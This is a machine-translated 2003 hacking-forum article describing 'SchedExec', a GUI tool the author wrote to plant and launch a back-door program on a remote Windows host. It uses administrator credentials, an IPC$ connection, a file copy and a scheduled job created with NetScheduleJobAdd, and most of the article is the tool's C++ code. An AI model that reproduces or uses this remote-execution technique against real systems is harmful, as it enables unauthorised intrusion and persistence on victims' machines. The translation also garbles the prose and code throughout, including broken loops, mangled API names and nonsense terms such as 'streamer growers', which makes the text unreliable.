Analysis of the programming implementation of "streamer growers" into:
http://www.xfocus.net
Creation time: 2003-10-01
Article attribute: original
Article submission:
Inetufo (inetufo_at_fz5fz.org)
Analysis of the Programming Realization of "Drainage Growers"
Author: inetufo
Email: inetufo@fz5fz.org
Homepage:
http://www.fz5fz.org
After getting the account and password of the remote host administrator privilege, we often want to leave a back door for yourself, which has to launch our latte programs on the remote host. The usual approach is to achieve it with a range of commands. About IPC $ invading tutorial is a lot of piles online, but these commands have not been ignored too cumbersome. The growing growers provide us with an automatic function of starting programs on remote hosts. This is convenient to start the program on the remote host. Since the old version is now expired, Xiao Yan is not released from the new version, and there are also such problems in all online crack versions. So now it is also very beautiful (I didn't say that the light is not good, don't lose me :)), but growers are really very convenient. So I decided to write a procedure with growers. It is just a few days before I asked a similar problem on our FZ5FZ. He gives a large number of code, then ask what method should be used when you start the program. After a while, Intuitive tells me that the flow of growers should be a module that integrates several network commands. It is similar to the principle of starting the program with the AT command. So I contracted the AT.EXE program that Windows XP (I used by Windows XP, Windows 2000), observed the DLL file called by the program, and used NetApi32.dll through an analytical discovery program. NetschedulejobAdd function. (Of course, you don't have to use the anti-assessment method to get this information, many tools can analyze the modules cited by the program, such as the Depends.exe with VC 6.0 comes with the name of this program, I should know it. Function. In MSDN, this function is defined as follows:
NetschedulejobAdd
.............................
NET_API_STATUS NetScheduleJobAdd (
LPCWSTR ServerName, // Remote host DNS name or NULL represents a local host
LPBYTE BUFFER, / / Pointer to the AT_INFO structure
LPDWORD JOBID / / Pointer to the newly added job ID
);
English is very simple, I don't have to translate it. It should be noted that this function needs to rely on Schedule services.
Ok, the key is here, and now you can write our own "lightweight growers", I have given it name for SchedExec (because it is relying on the SCHEDULE service to start the program).
During the writing of the entire program, I think the most difficult is not a function code, but the code that interfaces. Oh, in fact, it is simple to implement the part of the function. Let's take a look at several important functions.
First establish an IPC connection with the remote host, this is a function
DWORD WNETADDCONNECTION2 (
LpnetResource LpnetResource, // NetResource structure pointer LPCTSTSTR LPPASSWORD, / / password pointer
LPCTSTR LPUSERNAME, // User Name pointer
DWORD DWFLAGS / / Value for describing the connection options
);
Realize it.
Next to get the time of the remote host, this can pass the function:
NET_API_STATUS NETREMOTETOD (
LPCWSTR UNCSERVERNAME, // Remote host DNS name or NULL represents a local host
LPBYTE * bufferptr // time_of_day_info structure pointer
);
to fulfill.
As for the part of the file copy is very simple, I will not say it.
Finally, use the NetschedulejobAdd API function to add a new job.
For details of these functions, please refer to the MSDN documentation.
Below I gave the code snippet for implementing the function (because it is the MFC GUI program, it is impossible to put all the code in the article, you can go to our homepage to download the full project file)
/ / The message response function of the start button is implemented here.
Void cipctoolsdlg :: onstart ()
{
Updatedata ();
CPROMPTDLG PROMPTDLG;
IF (m_stripaddress.isempty () || m_strusername.isempty ())
{
Promptdlg.m_strimage = _t ("Please fill in the IP, username, password.");
PROMPTDLG.DOMODAL ();
Return;
}
IF (m_strlocalfile.isempty ())
{
Cfiledlg DLG;
DLG.M_STRMESSAGE = _t ("Is there any file?");
IF (DLG.Domodal () == iDCancel)
Return;
Else
Bfileexist = true;
}
IF (M_STRSTARTCMD.ISEMPTY ())
{
Promptdlg.m_strimage = _t ("Please specify the program you want to run.");
PROMPTDLG.DOMODAL ();
Return;
}
// Establish an IPC connection with a custom function
Bool Bret = ConnectiPC ((tchar *) m_stripaddress.operator lpctstr (), m_strusername.operator lpctstr (), m_strpassword.operator lpctstr ());
IF (Bret == False)
{
DisconnectiPC (Tchar *) m_stripaddress.operator lpctstr ());
For (INT i = 1; i <= 50; i )
M_Progress.SetPos (i);
Promptdlg.m_strMessage =_T ("Connection failed.");
promptdlg.domodal () == idok)
M_Progress.SetPos (0);
Return;
}
LPTIME_OF_DAY_INFO PBUF = NULL;
NET_API_STATUS NSTATUS;
NSTATUS = NetRemotetoD (m_stripaddress.allocsystring (), (lpbyte *) & pbuf); // Get the time of the remote host
IF (NSTATUS! = NERR_SUCCESS)
{
DisconnectiPC (Tchar *) m_stripaddress.operator lpctstr ());
For (int i = 1; i <= 100; i ) m_progress.setpos (i);
Promptdlg.m_strMessage = _t ("gets the remote host time failed.");
promptdlg.domodal () == idok)
M_Progress.SetPos (0);
Return;
}
IF (PBUF! = NULL)
Netapibufferfree (PBUF);
Strremotefile = _t ("" m_stripaddress "//" m_strremotefile);
IF (! bfileexist)
{
Bret = :: copyfile (m_strlocalfile.operator lpctstr (), strremotefile.operator lpctstr (), false; // Copy file remote host
IF (! bret)
{
DWORD dwret = getLastError ();
DisconnectiPC (Tchar *) m_stripaddress.operator lpctstr ());
For (int i = 1; i <= 150; i )
M_Progress.SetPos (i);
Cstring strmessage;
StrMessage.Format (_t ("(" ("(% d)"), dwret);
StrMessage = _T ("copy file") strremotefile _t ("failed" StrMessage;
Promptdlg.m_strimage = strmessage;
promptdlg.domodal () == idok)
M_Progress.SetPos (0);
Return;
}
}
DWORD day = 1;
CTIMETM (PBUF-> TOD_YEAR, PBUF-> TOD_MONTH, PBUF-> TOD_DAY, PBUF-> TOD_HOURS (- PBUF-> TOD_TIMEZONE) / 60, PBUF-> TOD_MINS, PBUF-> TOD_SECS;
For (int i = 1; i Day = day * 2; LPDWORD JOBID; AT_INFO AI; MEMSET (& AI, 0, SIZEOF (AI)); / / Assign a value for each member of the AI structure variable Ai.command = m_strstartcmd.allocsystring (); Ai.daysofmonth = day; Ai.daysofweek = 0; Ai.flags = job_noninteractive; Ai.jobtime = ((PBUF-> TOD_HOURS (- PBUF-> TOD_TIMEZONE) / 60)% 24) * 60 * 60 * 1000 (PBUF-> TOD_MINS 1) * 60 * 1000; NSTATUS = NetscheduleJobAdd (m_stripaddress.allocsystring (), lpbyte (& ai), job); // Add job IF (nStatus == Nerr_suCcess) { DisconnectiPC (Tchar *) m_stripaddress.operator lpctstr ()); For (INT i = 1; i <= 1000; i ) M_Progress.SetPos (i); promptlg.m_strimage = _t ("The specified program will start after 60 seconds."); promptdlg.domodal () == idok) M_Progress.SetPos (0); Return; } Else { DisconnectiPC (Tchar *) m_stripaddress.operator lpctstr ()); DWORD dwret = getLastError (); For (INT i = 1; i <= 200; i ) M_Progress.SetPos (i); Cstring strmessage; StrMessage.Format (_t ("(" ("(% d)"), dwret); StrMessage = _T ("Startup Process Failure" StrMessage; Promptdlg.m_strimage = strmessage; promptdlg.domodal () == idok) M_Progress.SetPos (0); Return; } } Last explanation, the starter will fail to start the program until 0:00 am. The program is now modified. What you need can re-download it in our homepage. If you have any questions, please call me to communicate. I wish you all a happy National Day, I should sleep, I haven't stayed up late for a long time :). Inetufo is written at 5 am in 2003-10-01. about Us: FZ5FZ mainly engaged in learning and research of network / system security, in-depth programming technology analysis and discussion, adhere to original, pursue sharing. FZ5FZ Homepage: http://www.fz5fz.org
